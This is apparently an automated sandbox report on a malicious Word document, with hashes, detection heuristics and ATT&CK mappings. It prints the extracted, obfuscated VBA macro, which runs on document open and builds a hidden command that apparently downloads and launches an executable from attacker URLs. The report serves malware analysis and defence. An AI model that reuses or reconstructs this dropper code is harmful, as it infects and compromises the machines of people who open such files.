Office (OLE) malware analysis — malicious · 7974ab215fab27f5

MALICIOUS

Office (OLE)

67.9 KB Created: 2018-09-07 06:38:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: 081d31d045f566869c94ca4140b04249 SHA-1: 523bd22e09e504195c92dde026d4acef6453b1ef SHA-256: 7974ab215fab27f56cbbfccde16afa5f400545136eee067ecf36e3b896d8f234

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical 'OLE_VBA_SHELL' heuristic indicates the use of the Shell() function, which is used within the Document_open macro to execute a command. The script attempts to construct and execute a command string, likely for downloading and running a second-stage payload. The exact command constructed is difficult to fully determine due to obfuscation, but the intent is clear.

Heuristics 5

ClamAV: Doc.Malware.Generic-6675131-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6675131-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5723 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5723 bytes
SHA-256: `7a926bd3151f93a4bb444331da450e742acf6e8734ca1490a2f6d51c5657ba47`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "UUMKOzROmNol" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Shell Format(cGwADF) + WhJotIkAnHBl + uppwltMdCoE + ahLNf + zVYOzzH + IPEZvWD + bacASWuCCoGuU + PLVjaBLGLFTqV, vbHide End Sub Attribute VB_Name = "fVkvRIaLHiOzY" Function ahLNf() On _ Error _ Resume _ Next Month "XquhN" + "9785" + "Ss" + "ZIisfiiwu" Month "1513" + "328053512" Month "188487222" + "OSQ" + "NTCN" + "5292" Month "hU" + "397719252" Month "VXwmiqiQ" + "286483677" + "YtoBrK" + "S" LQajYah = Chr(6 + 10 + 1 + 11 + 71) + "m" + "d /V^:" + "/" + Chr(4 + 7 + 0 + 7 + 49) + Chr(2 + 3 + 0 + 3 + 26) + "^" + "se^" + "t v^B" + "^s=^ ^" + " ^" Month "5437" + "qV" Month "zrBASGGRI" + "MHAHhqYQwWs" + "QZhMA" + "8976" Month "O" + "z" + "96098286" + "AnnoiwQ" dGMwZiN = " ^ " + "^ ^ " + "^ ^" + " ^ ^ " + "}}" + "{h" + Chr(6 + 10 + 1 + 11 + 71) + "t^a" + Chr(6 + 10 + 1 + 11 + 71) + "^}^" + ";kae" + "r^b;^d" Month "OiD" + "299664965" + "L" + "Uz" Month "cDZabSF" + "K" + "2848" + "ukMi" hQnjCLFKao = "f^" + "w" + "$ ^m^" + "etI-" + "ekov" + "nI^;)df" + "w$^" + " ,^" + "D^Zd" + "$(e^l" + "^i^Fd" + "^" + "a^o^ln^" Month "468163565" + "BqRi" + "1978" + "P" Month "v" + "2449" + "LpXhRc" + "vwN" iHzaCwsGmk = "wo^" + "D^.H" + "^Af^${" + "^yr^" + "t^" Month "j" + "315781567" + "fbwuVhHXhhz" + "31248209" Month "sKHOk" + "8439" + "RUA" + "dSGHoXoiZjnu" Month "jdH" + "mDFioaYXzB" + "W" + "JKztOKUo" Month "ijjQamUCD" + "2048" NjlfRfWjhvc = "{)z" + "^d" + "^i^$" + "^ n^" + "i" + " ^" Month "P" + "V" Month "sR" + "muOu" + "1197" + "vIwa" Month "490733698" + "TDzwbNLw" + "dlYzWOl" + "zPbcQnkm" Month "mw" + "RCHCWH" + "8839" + "jpAWQYIKjBLBz" VWDjOf = "DZd^" + "$(^h" + Chr(6 + 10 + 1 + 11 + 71) + "a" + "er^o" + "f^;^'^e" + "x^e.^'" + "^" + "+E" + "^l^Q^$+" + "^'" + "\^'^+" + Chr(6 + 10 + 1 + 11 + 71) + "i^" + "l^b^u" Month "vsUh" + "104123661" + "wjQCiGp" + "5683" Month "9781" + "5706" + "7476" + "53993045" Month "IK" + "wPvc" + "zDw" + "2886" Month "VL" + "404610404" + "269016478" + "KFS" Month "zkwPCnztM" + "vRuY" ZIKwzjujfV = "p^:" + "vn^e^$" + "^=d^f^" + "w^$^;'" + "5" + "^" + "4" + "' ^" Month "422" + "388310628" Month "itF" + "pIaOfB" + "3812" + "3931" YvWWcCB = "= ^E^" + "lQ^$^;" + ")'@'(t" + "i" + "lp" Month "lIEojWnrf" + "529501901" + "64541272" + "169400558" Month "209816862" + "4400" + "uXBj" + "mRD" Month "414" + "lJv" + "2805" + "iafC" Month "1722" + "QhRjmElYfC" YmXjjAtib = "S^.'" + "^m/mo" + Chr(6 + 10 + 1 + 11 + 71) + "^" + ".^" + "z" + "en" + "e^" + "m^i^j" Month "tIlT" + "Amwa" + "3243" + "331170547" Month "477339906" + "4594" Month "9843" + "Wtuvnz" XHjZzm = "^" + "l^op" + "/" + "/^:pt^" + "t^h^" + "@5^m" + "k/^s^" + "ed^" + "ul" + Chr(6 + 10 + 1 + 11 + 71) + "ni/ni" + "m^d^a-" ahLNf = LQajYah + dGMwZiN + hQnjCLFKao + iHzaCwsGmk + NjlfRfWjhvc + VWDjOf + ZIKwzjujfV + YvWWcCB + YmXjjAtib + XHjZzm Month "187544220" + "U" + "Alvcrp" + "Gi" Month "4585" + "bXQLisZmQcnX" Month "VcdhsWtiAsXprU" + "csv" + "skvnIvSs" + "mjbozPztQND" Month "NZoUm" + "iHrTQ" Month "Avca" + "259558613" + "GZCXFwbdnwczkB" + "AU" End Function Function zVYOzzH() On _ Error _ Resume _ Next Month "BwmidMPtTcQYzK" + "DO" + "onc" + "V" Month "m" + "G" + "105461822" + "1167" Month "220374061" + "249679058" + "311798076" + "mIn" Month "fWizKwmFaEzo" + "8941" diCYmMZ = "pw/" + "^" + "mo" + Chr(6 + 10 + 1 + 11 + 71) + ".re" + "^ma" + "^g^it" + "^l^u" + "^.^ww" + "w/" + "/:^p" + "t^th" + "^@Rs^k" + "^Y^T" Month "twqltJdd" + "9805" + "YG" + "493990139" Month "bVOiYXWz" + "389978724" + "104120289" + "Vw" lmdOdNYPq = "^0/^mo" + Chr(6 + 10 + 1 + 11 + 71) + "^.r^e^" + "tt^e" + "rtre^" + "te" Month "bBaVmw" + "1037" + "244603985" + "4228" zaOzXYl = "p/ ... (truncated)

SHA-256: 7a926bd3151f93a4bb444331da450e742acf6e8734ca1490a2f6d51c5657ba47

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "UUMKOzROmNol"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(cGwADF) + WhJotIkAnHBl + uppwltMdCoE + ahLNf + zVYOzzH + IPEZvWD + bacASWuCCoGuU + PLVjaBLGLFTqV, vbHide
End Sub



Attribute VB_Name = "fVkvRIaLHiOzY"
Function ahLNf()

On _
Error _
Resume _
Next
Month "XquhN" + "9785" + "Ss" + "ZIisfiiwu"
   Month "1513" + "328053512"
   Month "188487222" + "OSQ" + "NTCN" + "5292"
   Month "hU" + "397719252"
   Month "VXwmiqiQ" + "286483677" + "YtoBrK" + "S"
LQajYah = Chr(6 + 10 + 1 + 11 + 71) + "m" + "d /V^:" + "/" + Chr(4 + 7 + 0 + 7 + 49) + Chr(2 + 3 + 0 + 3 + 26) + "^" + "se^" + "t v^B" + "^s=^  ^" + "  ^"
Month "5437" + "qV"
   Month "zrBASGGRI" + "MHAHhqYQwWs" + "QZhMA" + "8976"
   Month "O" + "z" + "96098286" + "AnnoiwQ"
dGMwZiN = "    ^ " + "^  ^ " + "^ ^" + " ^  ^ " + "}}" + "{h" + Chr(6 + 10 + 1 + 11 + 71) + "t^a" + Chr(6 + 10 + 1 + 11 + 71) + "^}^" + ";kae" + "r^b;^d"
Month "OiD" + "299664965" + "L" + "Uz"
   Month "cDZabSF" + "K" + "2848" + "ukMi"
hQnjCLFKao = "f^" + "w" + "$ ^m^" + "etI-" + "ekov" + "nI^;)df" + "w$^" + " ,^" + "D^Zd" + "$(e^l" + "^i^Fd" + "^" + "a^o^ln^"
Month "468163565" + "BqRi" + "1978" + "P"
   Month "v" + "2449" + "LpXhRc" + "vwN"
iHzaCwsGmk = "wo^" + "D^.H" + "^Af^${" + "^yr^" + "t^"
Month "j" + "315781567" + "fbwuVhHXhhz" + "31248209"
   Month "sKHOk" + "8439" + "RUA" + "dSGHoXoiZjnu"
   Month "jdH" + "mDFioaYXzB" + "W" + "JKztOKUo"
   Month "ijjQamUCD" + "2048"
NjlfRfWjhvc = "{)z" + "^d" + "^i^$" + "^ n^" + "i" + " ^"
Month "P" + "V"
   Month "sR" + "muOu" + "1197" + "vIwa"
   Month "490733698" + "TDzwbNLw" + "dlYzWOl" + "zPbcQnkm"
   Month "mw" + "RCHCWH" + "8839" + "jpAWQYIKjBLBz"
VWDjOf = "DZd^" + "$(^h" + Chr(6 + 10 + 1 + 11 + 71) + "a" + "er^o" + "f^;^'^e" + "x^e.^'" + "^" + "+E" + "^l^Q^$+" + "^'" + "\^'^+" + Chr(6 + 10 + 1 + 11 + 71) + "i^" + "l^b^u"
Month "vsUh" + "104123661" + "wjQCiGp" + "5683"
   Month "9781" + "5706" + "7476" + "53993045"
   Month "IK" + "wPvc" + "zDw" + "2886"
   Month "VL" + "404610404" + "269016478" + "KFS"
   Month "zkwPCnztM" + "vRuY"
ZIKwzjujfV = "p^:" + "vn^e^$" + "^=d^f^" + "w^$^;'" + "5" + "^" + "4" + "' ^"
Month "422" + "388310628"
   Month "itF" + "pIaOfB" + "3812" + "3931"
YvWWcCB = "= ^E^" + "lQ^$^;" + ")'@'(t" + "i" + "lp"
Month "lIEojWnrf" + "529501901" + "64541272" + "169400558"
   Month "209816862" + "4400" + "uXBj" + "mRD"
   Month "414" + "lJv" + "2805" + "iafC"
   Month "1722" + "QhRjmElYfC"
YmXjjAtib = "S^.'" + "^m/mo" + Chr(6 + 10 + 1 + 11 + 71) + "^" + ".^" + "z" + "en" + "e^" + "m^i^j"
Month "tIlT" + "Amwa" + "3243" + "331170547"
   Month "477339906" + "4594"
   Month "9843" + "Wtuvnz"
XHjZzm = "^" + "l^op" + "/" + "/^:pt^" + "t^h^" + "@5^m" + "k/^s^" + "ed^" + "ul" + Chr(6 + 10 + 1 + 11 + 71) + "ni/ni" + "m^d^a-"
ahLNf = LQajYah + dGMwZiN + hQnjCLFKao + iHzaCwsGmk + NjlfRfWjhvc + VWDjOf + ZIKwzjujfV + YvWWcCB + YmXjjAtib + XHjZzm
   Month "187544220" + "U" + "Alvcrp" + "Gi"
   Month "4585" + "bXQLisZmQcnX"
   Month "VcdhsWtiAsXprU" + "csv" + "skvnIvSs" + "mjbozPztQND"
   Month "NZoUm" + "iHrTQ"
   Month "Avca" + "259558613" + "GZCXFwbdnwczkB" + "AU"
End Function
Function zVYOzzH()

On _
Error _
Resume _
Next
Month "BwmidMPtTcQYzK" + "DO" + "onc" + "V"
   Month "m" + "G" + "105461822" + "1167"
   Month "220374061" + "249679058" + "311798076" + "mIn"
   Month "fWizKwmFaEzo" + "8941"
diCYmMZ = "pw/" + "^" + "mo" + Chr(6 + 10 + 1 + 11 + 71) + ".re" + "^ma" + "^g^it" + "^l^u" + "^.^ww" + "w/" + "/:^p" + "t^th" + "^@Rs^k" + "^Y^T"
Month "twqltJdd" + "9805" + "YG" + "493990139"
   Month "bVOiYXWz" + "389978724" + "104120289" + "Vw"
lmdOdNYPq = "^0/^mo" + Chr(6 + 10 + 1 + 11 + 71) + "^.r^e^" + "tt^e" + "rtre^" + "te"
Month "bBaVmw" + "1037" + "244603985" + "4228"
zaOzXYl = "p/
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.